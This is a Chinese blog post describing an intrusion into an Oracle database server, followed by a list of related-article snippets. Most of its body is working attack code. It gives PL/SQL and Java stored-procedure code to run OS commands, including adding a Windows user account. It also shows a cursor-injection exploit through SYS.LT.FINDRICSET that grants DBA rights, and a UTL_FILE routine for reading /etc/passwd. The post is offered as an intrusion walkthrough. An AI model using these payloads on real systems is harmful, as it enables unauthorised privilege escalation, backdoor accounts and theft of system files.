oracle服务器权限,入侵Oracle服务器进一步获取权限

最新推荐文章于 2022-07-20 17:09:21 发布
最新推荐文章于 2022-07-20 17:09:21 发布
阅读量72 收藏
点赞数
文章标签: oracle服务器权限

很快便连接上Oracle服务器,此时发现:

1.连接后不是dba权限

2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限

3.运行SELECT UTL_HTTP.request(‘http://xxxxxxxxxxx/login.jsp’) FROM dual 后发现oracle服务器不能连接网络。

幸运的是,

运行

create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1;end;

成功!这个用户具有create proceduce权限。

此时马上想到创建java扩展执行命令:

create or replace and compile java source named “LinxUtil” as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=”";while ((stemp = myReader.readLine()) != null) str +=stemp+” “;myReader.close();return str;} catch (Exception e){return e.toString();}}}

begin dbms_java.grant_permission(‘PUBLIC’, ‘SYS:java.io.FilePermission’, ‘<>’, ‘execute’ );end;

create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ‘LinxUtil.runCMD(java.lang.String) return String’

select * from all_objects where object_name like ‘%LINX%’

grant all on LinxRunCMD to public

select LinxRunCMD(‘cmd /c net user linx /add’) from dual

但是在第一步就卡住了,服务器由于某种未知原因 不能创建java扩展!!

还好,我们还有UTL库可以利用:

create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is

fHandler UTL_FILE.FILE_TYPE;

buf varchar2(4000);

output varchar2(8000);

BEGIN

fHandler := UTL_FILE.FOPEN(‘UTL_FILE_DIR’, filename, ‘r’);

loop

begin

utl_file.get_line(fHandler,buf);

DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||buf);

exception

when no_data_found then exit;

end;

output := output||buf||chr(10);

end loop;

UTL_FILE.FCLOSE(fHandler);

return output;

END;

UTL_FILE_DIR需要先用:

CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;

指定目。但运行后发现没有权限。只好想办法提权。

***************游标注射***************

老外写了N个pdf介绍这技术,我精简了代码:

DECLARE

MYC NUMBER;

BEGIN

MYC := DBMS_SQL.OPEN_CURSOR;

DBMS_SQL.PARSE(MYC,’declare pragma autonomous_transaction; begin execute immediate ”GRANT DBA TO linxlinx_current_db_user”;commit;end;’,0);

DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

BEGIN SYS.LT.FINDRICSET(‘.”||dbms_sql.execute( ‘||MYC||’ )||””)–’,'x’); END;

raise NO_DATA_FOUND;

EXCEPTION

WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

END;

运行后重新连接就有dba权限了,简单吧……

现在可以读取文件了:

CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;

select LinxUTLReadfile(‘passwd’) from dual

后面就简单了,不写了。0b1331709591d260c1c78e86d0c51c18.png

weixin_39805734
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Oracle细粒度审计的安全性应用.pdf
10-10
FGA的核心在于它可以识别并记录合法用户权限的误用,减少无用的审计日志记录,同时支持入侵检测。通过定义自定义的SQL谓词作为审计策略,FGA可以针对特定表或视图进行审计。例如,当查询涉及特定列并且满足预设条件...
关于Oracle数据库的权限管理
最新发布
m0_67998130的博客
10-27 1348
权限传递有两种方式with admin option 和 with grant option,这两种方式的特点是 with admin option: 用户A可以将拥有权限赋予用户B,如果用户A的该权限被收回了,用户B是不会受到 影响,该方式用于系统权限 with grant option:用户A可以将拥有权限赋予用户B,如果用户A的该权限被收回了,用户B也会被收回, 该方式用于对象权限。ps:用户A可以将拥有权限赋予用户B,如果用户A的该权限被收回了,用户B也会被收回,该方式用于 对象权限
oracle 权限一览表
weixin_34191845的博客
12-15 668
为什么80%的码农都做不了架构师?>>> ...
oracle权限和服务
08-04 116
(1)OracleServiceSID 数据库服务,这个服务会自动地启动和停止数据库。如果安装了一个数据库,它的缺省启动类型为自动。服务进程为Oracle.EXE,参数文件initSID.ora,日志文件SIDALRT.log,控制台SVRMGRL.EXE、S...
oracle数据库权限
Y_Mojito_的博客
07-20 8269
数据库权限
Oracle数据库(权限、用户、角色、基本知识介绍)
热门推荐
DemoTransfer
10-04 3万+
oracle(权限/用户/角色)
浅议ORACLE数据库安全性策略 (2).pdf
10-10
2. Oracle服务器实用程序的安全性:为了防止非法用户滥用Oracle服务器,应限制对某些程序的访问权限。例如,SQL*Plus和SQL Forms等公共可执行程序应只允许Oracle组内的用户执行,并将这些程序的权限设置为710。此外...
Hacking_Oracle_From_Web_2.zip_WEB HACKING_oracle
09-20
9. **防御策略**:除了攻击,还应学习如何防止这类攻击,如输入验证、参数化查询、最小权限原则、数据库防火墙和入侵检测系统。 【标签】"web_hacking oracle" 强调了Web攻击和Oracle数据库的安全关联,这意味着...
探讨医院Oracle数据库的日常维护与优化方法.pdf
10-09
优化操作系统参数,如调整内存分配、磁盘I/O调度、网络设置等,可以进一步提升数据库性能。同时,监控系统资源使用情况,及时发现并解决问题。 2.3 SQL语句优化 分析和优化SQL查询是数据库性能优化的重要环节。通过...
华盾服务器管理专家 3.0.3.78.rar
07-17
华盾服务器管理专家是一款服务器日常维护管理软件,集华盾独创的“WEB一站式管理”、用户权限管理、信息管理管理、性能管理管理、网站安全管理、主机维护管理、网站备案管理、网站维护管理、网络防火墙管理、系统...
hacking oracle笔记
cnbird's blog
03-17 1408
###author:hiphop### ###qq:70381908###为什么要关注 Oracle ?因为Oracle 被大量企业所使用,有许多目标可以选择来渗透许多企业都没有更新且有潜在的方险!提权非常简单,容易拿到shell!!读了blackhat paper 让我开始来研究Oracle因为他只讲到一小部份 真正安全问题还有很广的只是国内好像很少挖掘 因为遇到的环境不多 但是阿 Oracle
黑客攻击入侵服务器的6种常见方式
Qq1014136047的博客
01-04 7792
服务器入侵既有一定的偶然性,也有一定的必然性,网络上有两种黑客,一种是漫无目的的漫天撒网形式的黑客,一种是目标明确只入侵指定目标的黑客,我们称前一种黑客叫菜鸟黑客,称后一种黑客叫高级黑客。简单的说,菜鸟黑客一般大规模扫描网络,根据扫描结果很偶然的发现了服务器系统存在这样那样的漏洞,于是展开了攻击;而高级黑客只是对感兴趣的目标系统或指定IP展开扫描,全方位地运用多种手段进行攻击。 1.服务器的服务信息、服务软件种类及版本。 获取目标服务器提供那些服务及各种服务的软件类型、版本。我们不仅应该关注端口,
Oracle用户,权限,角色以及登录管理
荣耀之路
03-13 1万+
1. sys和system用户的区别 system用户只能用normal身份登陆em。除非你对它授予了sysdba的系统权限或者syspoer系统权限。 sys用户具有“SYSDBA”或者“SYSOPER”权限,登陆em也只能用这两个身份,不能用normal。 -- 最重要的区别,存储的数据的重要性不同 sys所有oracle的数据字典的基表和视图都存放在sys用户中,这些基表和视图
网站ftp服务器漏洞利用,网站入侵渗透综合分析和FTP提权得系统权限
weixin_32175667的博客
08-04 974
当我们想入侵检测一个网站拿后台/webshell后想进一步获得网站的服务器管理权限。小残在这里为大家介绍下一下思路第一个思路:啊D+GOOGLE找注入点PS:可以通过直接在网站查看动态界面 类似于:asp?id=的动态界面进行手工查找如果没找到动态页面可以通过百度或者谷歌进行搜索网站的动态页面通过谷歌语法: 假如要查看的网站是www.*****.net 那么就可以这样搜索 site:www.***...
WEBSHELL权限提升技巧(综合版)
蓝法典的专栏
08-19 3881
c: d: e:.....C:/Documents and Settings/All Users/「开始」菜单/程序/看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,
Hacking Oracle 之光标注射
cnbird's blog
02-11 559
Hacking Oracle 之光标注射
oracle中java存储过程的权限设置
08-05 2147
oracle数据库中可以通过写java存储过程来完成许多复杂的功能,但是java存储过程在访问本地文件系统、连接网络、或者运行系统命令时,就必须为执行该过程的模式赋予相应的权限。不然执行该存储过程就会报无该操作权限的异常。 Java写的存储过程的默认权限和网页中的Applet差不多,比如不能操作文件系统、不能随便访问网络,也不能获取机器的Runtime。其实安全机制几乎是一样的,都是基于沙箱模...
"数据库服务器安全评估:防范员工犯错,保护数据库不受攻击
组织应定期更新操作系统和应用程序,及时安装安全补丁,配置防火墙和入侵检测系统,以阻止未经授权的访问和攻击。此外,组织还应制定完善的访问控制策略,包括用户身份验证、权限管理和审计跟踪,以确保只有授权用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值